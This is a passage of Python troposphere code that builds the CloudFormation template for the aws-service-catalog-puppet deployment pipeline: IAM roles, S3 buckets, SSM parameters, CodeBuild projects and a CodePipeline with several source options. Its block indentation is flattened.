log_bucket = template.add_resource(s3.Bucket('LogStore', BucketName=t.Sub('sc-puppet-log-store-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
manual_approvals_param = template.add_resource(ssm.Parameter('ManualApprovalsParam', Type='String', Name='/servicecatalog-puppet/manual-approvals', Value=t.Ref(with_manual_approvals_parameter)))
template.add_resource(ssm.Parameter('SpokeDeployEnvParameter', Type='String', Name=constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME, Value=t.Ref(spoke_deploy_environment_compute_type_parameter)))
param = template.add_resource(ssm.Parameter('Param', Type='String', Name='service-catalog-puppet-version', Value=t.Ref(version_parameter)))
partition_parameter = template.add_resource(ssm.Parameter('PartitionParameter', Type='String', Name='/servicecatalog-puppet/partition', Value=t.Ref('AWS::Partition')))
puppet_role_name_parameter = template.add_resource(ssm.Parameter('PuppetRoleNameParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/name', Value=t.Ref(puppet_role_name_parameter)))
puppet_role_path_parameter = template.add_resource(ssm.Parameter('PuppetRolePathParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/path', Value=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('ShareAcceptFunctionRole', RoleName='ShareAcceptFunctionRole', ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole')], Path=t.Ref(puppet_role_path_template_parameter), Policies=[iam.Policy(PolicyName='ServiceCatalogActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Resource': {'Fn::Sub': 'arn:${AWS::Partition}:iam::*:role${PuppetRolePath}${PuppetRoleName}'}, 'Effect': 'Allow'}]})], AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['lambda.amazonaws.com']}}]}))
template.add_resource(iam.Role('ProvisioningRole', RoleName='PuppetProvisioningRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_provisioning_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('CloudFormationDeployRole', RoleName='CloudFormationDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['cloudformation.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(cloud_formation_deploy_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('PipelineRole', RoleName='PuppetCodePipelineRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_code_pipeline_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('SourceRole', RoleName='PuppetSourceRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(source_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role(constants.REPORTING_ROLE_NAME, RoleName=constants.REPORTING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='ReportingActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:PutObject'], 'Resource': t.Sub('${LogStore.Arn}/*'), 'Effect': 'Allow'}, {'Action': ['cloudwatch:PutMetricData'], 'Resource': '*', 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role(constants.CACHE_DOWNLOADING_ROLE_NAME, RoleName=constants.CACHE_DOWNLOADING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='DownloadingCacheActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:GetObject'], 'Resource': t.Sub('${CachingBucket.Arn}/*'), 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(sns.Topic('DryRunNotificationTopic', DisplayName='service-catalog-puppet-dry-run-approvals', TopicName='service-catalog-puppet-dry-run-approvals', Condition='HasManualApprovals'))
deploy_role = template.add_resource(iam.Role('DeployRole', RoleName='PuppetDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_deploy_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
num_workers_ssm_parameter = template.add_resource(ssm.Parameter('NumWorkersSSMParameter', Type='String', Name='/servicecatalog-puppet/deploy/num-workers', Value=t.Sub('${DeployNumWorkers}')))
parameterised_source_bucket = template.add_resource(s3.Bucket('ParameterisedSourceBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-parameterised-runs-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage = codepipeline.Stages(Name='Source', Actions=[codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ParameterisedSource')], Configuration={'S3Bucket': t.Ref(parameterised_source_bucket), 'S3ObjectKey': 'parameters.zip', 'PollForSourceChanges': True}, Name='ParameterisedSource')])
install_spec = {'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}
deploy_env_vars = [{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Ref('AWS::AccountId')}, {'Type': 'PLAINTEXT', 'Name': 'PUPPET_REGION', 'Value': t.Ref('AWS::Region')}, {'Type': 'PARAMETER_STORE', 'Name': 'PARTITION', 'Value': t.Ref(partition_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_NAME', 'Value': t.Ref(puppet_role_name_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_PATH', 'Value': t.Ref(puppet_role_path_parameter)}]
if is_codecommit:
template.add_resource(codecommit.Repository('CodeRepo', RepositoryName=source.get('Configuration').get('RepositoryName'), RepositoryDescription='Repo to store the servicecatalog puppet solution', DeletionPolicy='Retain'))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeCommit'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'RepositoryName': source.get('Configuration').get('RepositoryName'), 'BranchName': source.get('Configuration').get('BranchName'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges', True)}, Name='Source'))
if is_github:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='ThirdParty', Version='1', Provider='GitHub'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'Owner': source.get('Configuration').get('Owner'), 'Repo': source.get('Configuration').get('Repo'), 'Branch': source.get('Configuration').get('Branch'), 'OAuthToken': t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:OAuthToken}}']), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
if is_custom:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='Custom', Version=source.get('Configuration').get('CustomActionTypeVersion'), Provider=source.get('Configuration').get('CustomActionTypeProvider')), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'GitUrl': source.get('Configuration').get('GitUrl'), 'Branch': source.get('Configuration').get('Branch'), 'PipelineName': t.Sub('${AWS::StackName}-pipeline')}, Name='Source'))
webhook = codepipeline.Webhook('Webhook', Authentication='IP', TargetAction='Source', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(AllowedIPRange=source.get('Configuration').get('GitWebHookIpAddress')), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.changes[0].ref.id', MatchEquals='refs/heads/{Branch}')], TargetPipelineVersion=1, TargetPipeline=t.Sub('${AWS::StackName}-pipeline'))
template.add_resource(webhook)
values_for_sub = {'GitUrl': source.get('Configuration').get('GitUrl'), 'WebhookUrl': t.GetAtt(webhook, 'Url')}
output_to_add = t.Output('WebhookUrl')
output_to_add.Value = t.Sub('${GitUrl}||${WebhookUrl}', **values_for_sub)
output_to_add.Export = t.Export(t.Sub('${AWS::StackName}-pipeline'))
template.add_output(output_to_add)
if is_codestarsourceconnection:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeStarSourceConnection'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'ConnectionArn': source.get('Configuration').get('ConnectionArn'), 'FullRepositoryId': source.get('Configuration').get('FullRepositoryId'), 'BranchName': source.get('Configuration').get('BranchName'), 'OutputArtifactFormat': source.get('Configuration').get('OutputArtifactFormat')}, Name='Source'))
if is_s3:
bucket_name = source.get('Configuration').get('S3Bucket')
if not scm_skip_creation_of_repo:
template.add_resource(s3.Bucket(bucket_name, PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=bucket_name, VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'S3Bucket': bucket_name, 'S3ObjectKey': source.get('Configuration').get('S3ObjectKey'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
single_account_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "single_account: \\"${SINGLE_ACCOUNT_ID}\\"" > parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_account_run_project_args = dict(Name='servicecatalog-puppet-single-account-run', Description='Runs puppet for a single account - SINGLE_ACCOUNT_ID', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SINGLE_ACCOUNT_ID', 'Value': 'CHANGE_ME'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec)))
single_account_run_project = template.add_resource(codebuild.Project('SingleAccountRunProject', **single_account_run_project_args))
single_account_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_account_run_project_args['Name'] = 'servicecatalog-puppet-single-account-run-with-callback'
single_account_run_project_args['Description'] = 'Runs puppet for a single account - SINGLE_ACCOUNT_ID and then does a http put'
single_account_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_account_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec))
single_account_run_project_with_callback = template.add_resource(codebuild.Project('SingleAccountRunWithCallbackProject', **single_account_run_project_args))
single_action_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "section: \\"${SECTION}\\"" > parameters.yaml', 'echo "item: \\"${ITEM}\\"" >> parameters.yaml', 'echo "include_dependencies: \\"${INCLUDE_DEPENDENCIES}\\"" >> parameters.yaml', 'echo "include_reverse_dependencies: \\"${INCLUDE_REVERSE_DEPENDENCIES}\\"" >> parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_action_run_project_args = dict(Name='servicecatalog-puppet-single-action-run', Description='Runs puppet for a single action', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SECTION', 'Value': 'CHANGE_ME - launches|stacks|assertions|spoke-local-portfolios|etc'}, {'Type': 'PLAINTEXT', 'Name': 'ITEM', 'Value': 'CHANGE_ME - name of the launch|stack|assertion|etc'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include your specified items dependencies true|false'}, {'Type': 'PLAINTEXT', 'Name': 'INCLUDE_REVERSE_DEPENDENCIES', 'Value': 'CHANGE_ME - should include things that depend on your specified item true|false'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec)))
single_action_run_project = template.add_resource(codebuild.Project('SingleActionRunProject', **single_action_run_project_args))
single_action_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_action_run_project_args['Name'] = 'servicecatalog-puppet-single-action-run-with-callback'
single_action_run_project_args['Description'] = 'Runs puppet for a single action and then does a http put'
single_action_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_action_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_action_run_project_build_spec))
single_action_run_project_with_callback = template.add_resource(codebuild.Project('SingleActionRunWithCallbackProject', **single_action_run_project_args))
stages = [source_stage]
if should_validate:
template.add_resource(codebuild.Project('ValidateProject', Name='servicecatalog-puppet-validate', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': constants.PARTITION_ENVIRONMENTAL_VARIABLE_NAME, 'Value': config.get_partition()}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version='0.2', phases={'install': {'runtime-versions': {'python': '3.9'}, 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, 'build': {'commands': ['servicecatalog-puppet validate manifest.yaml']}})), Type='CODEPIPELINE'), Description='Validate the manifest.yaml file'))
stages.append(codepipeline.Stages(Name='Validate', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source')], Name='Validate', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ValidateProject')], Configuration={'ProjectName': t.Ref('ValidateProject'), 'PrimarySource': 'Source'}, RunOrder=1)]))
if is_manual_approvals:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='DryRun', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DryRunProject')], Configuration={'ProjectName': t.Ref('DryRunProject'), 'PrimarySource': 'Source'}, RunOrder=1), codepipeline.Actions(ActionTypeId=codepipeline.ActionTypeId(Category='Approval', Owner='AWS', Version='1', Provider='Manual'), Configuration={'NotificationArn': t.Ref('DryRunNotificationTopic'), 'CustomData': 'Approve when you are happy with the dry run.'}, Name='DryRunApproval', RunOrder=2), codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source'}, RunOrder=3)])
else:
deploy_stage = codepipeline.Stages(Name='Deploy', Actions=[codepipeline.Actions(InputArtifacts=[codepipeline.InputArtifacts(Name='Source'), codepipeline.InputArtifacts(Name='ParameterisedSource')], Name='Deploy', ActionTypeId=codepipeline.ActionTypeId(Category='Build', Owner='AWS', Version='1', Provider='CodeBuild'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='DeployProject')], Configuration={'ProjectName': t.Ref('DeployProject'), 'PrimarySource': 'Source', 'EnvironmentVariables': '[{"name":"EXECUTION_ID","value":"#{codepipeline.PipelineExecutionId}","type":"PLAINTEXT"}]'}, RunOrder=1)])
stages.append(deploy_stage)
pipeline = template.add_resource(codepipeline.Pipeline('Pipeline', RoleArn=t.GetAtt('PipelineRole', 'Arn'), Stages=stages, Name=t.Sub('${AWS::StackName}-pipeline'), ArtifactStore=codepipeline.ArtifactStore(Type='S3', Location=t.Sub('sc-puppet-pipeline-artifacts-${AWS::AccountId}-${AWS::Region}')), RestartExecutionOnUpdate=True))
if is_github:
template.add_resource(codepipeline.Webhook('Webhook', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(SecretToken=t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:SecretToken}}'])), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.ref', MatchEquals='refs/heads/' + source.get('Configuration').get('Branch'))], Authentication='GITHUB_HMAC', TargetPipeline=t.Ref(pipeline), TargetAction='Source', Name=t.Sub('${AWS::StackName}-webhook'), TargetPipelineVersion=t.GetAtt(pipeline, 'Version'), RegisterWithThirdParty='true'))
deploy_project_build_spec = dict(version=0.2, phases=dict(install={'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}, pre_build={'commands': ['servicecatalog-puppet --info expand --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml manifest.yaml', 'servicecatalog-puppet --info generate-task-reference $PWD/manifest-expanded.yaml']}, build={'commands': ['servicecatalog-puppet --info deploy-from-task-reference --parameter-override-file $CODEBUILD_SRC_DIR_ParameterisedSource/parameters.yaml --num-workers ${NUM_WORKERS} .']}), artifacts=dict(name='DeployProject', files=['*.yaml', 'manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks/*.json']))
deploy_project_args = dict(Name='servicecatalog-puppet-deploy', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='CODEPIPELINE'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PARAMETER_STORE', 'Name': 'NUM_WORKERS', 'Value': t.Ref(num_workers_ssm_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'SPOKE_EXECUTION_MODE_DEPLOY_ENV', 'Value': constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME}] + deploy_env_vars), Source=codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec)), Description='deploys out the products to be deployed')
deploy_project = template.add_resource(codebuild.Project('DeployProject', **deploy_project_args))
deploy_project_build_spec['phases']['build']['commands'] = ['servicecatalog-puppet --info dry-run manifest-expanded.yaml']
deploy_project_build_spec['artifacts']['name'] = 'DryRunProject'
deploy_project_args['Name'] = 'servicecatalog-puppet-dryrun'
deploy_project_args['Description'] = 'dry run of servicecatalog-puppet-dryrun'
deploy_project_args['Source'] = codebuild.Source(Type='CODEPIPELINE', BuildSpec=yaml.safe_dump(deploy_project_build_spec))
dry_run_project = template.add_resource(codebuild.Project('DryRunProject', **deploy_project_args))
bootstrap_project = template.add_resource(codebuild.Project('BootstrapProject', Name='servicecatalog-puppet-bootstrap-spokes-in-ou', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'OU_OR_PATH', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_NAME', 'Value': 'OrganizationAccountAccessRole'}, {'Type': 'PLAINTEXT', 'Name': 'IAM_ROLE_ARNS', 'Value': ''}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': ''}]), Source=codebuild.Source(BuildSpec='version: 0.2\nphases:\n install:\n runtime-versions:\n python: 3.9\n commands:\n - pip install aws-service-catalog-puppet\n build:\n commands:\n - servicecatalog-puppet bootstrap-spokes-in-ou $OU_OR_PATH $IAM_ROLE_NAME $IAM_ROLE_ARNS ${OPTIONS}\nartifacts:\n files:\n - results/*/*\n - output/*/*\n name: BootstrapProject\n', Type='NO_SOURCE'), Description='Bootstrap all the accounts in an OU'))
template.add_resource(codebuild.Project('BootstrapASpokeProject', Name='servicecatalog-puppet-bootstrap-spoke', ServiceRole=t.GetAtt('DeployRole', 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=60, Environment=codebuild.Environment(ComputeType='BUILD_GENERAL1_SMALL', Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Sub('${AWS::AccountId}')}, {'Type': 'PLAINTEXT', 'Name': 'ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'ASSUMABLE_ROLE_IN_ROOT_ACCOUNT', 'Value': 'CHANGE_ME'}, {'Type': 'PLAINTEXT', 'Name': 'OPTIONS', 'Value': 'CHANGE_ME'}]), Source=codebuild.Source(BuildSpec=yaml.safe_dump(dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['servicecatalog-puppet bootstrap-spoke-as ${PUPPET_ACCOUNT_ID} ${ASSUMABLE_ROLE_IN_ROOT_ACCOUNT} ${ORGANIZATION_ACCOUNT_ACCESS_ROLE_ARN} ${OPTIONS}']}))), Type='NO_SOURCE'), Description='Bootstrap given account as a spoke'))
cloud_formation_events_queue = template.add_resource(sqs.Queue('CloudFormationEventsQueue', QueueName='servicecatalog-puppet-cloudformation-events', Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'})))
cloud_formation_events_queue_policy = template.add_resource(sqs.QueuePolicy('CloudFormationEventsQueuePolicy', Queues=[t.Ref(cloud_formation_events_queue)], PolicyDocument={'Id': 'AllowSNS', 'Version': '2012-10-17', 'Statement': [{'Sid': 'allow-send-message', 'Effect': 'Allow', 'Principal': {'AWS': '*'}, 'Action': ['sqs:SendMessage'], 'Resource': '*', 'Condition': {'ArnEquals': {'aws:SourceArn': t.Sub('arn:${AWS::Partition}:sns:*:${AWS::AccountId}:servicecatalog-puppet-cloudformation-regional-events')}}}]}))
spoke_deploy_bucket = template.add_resource(s3.Bucket('SpokeDeployBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-spoke-deploy-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
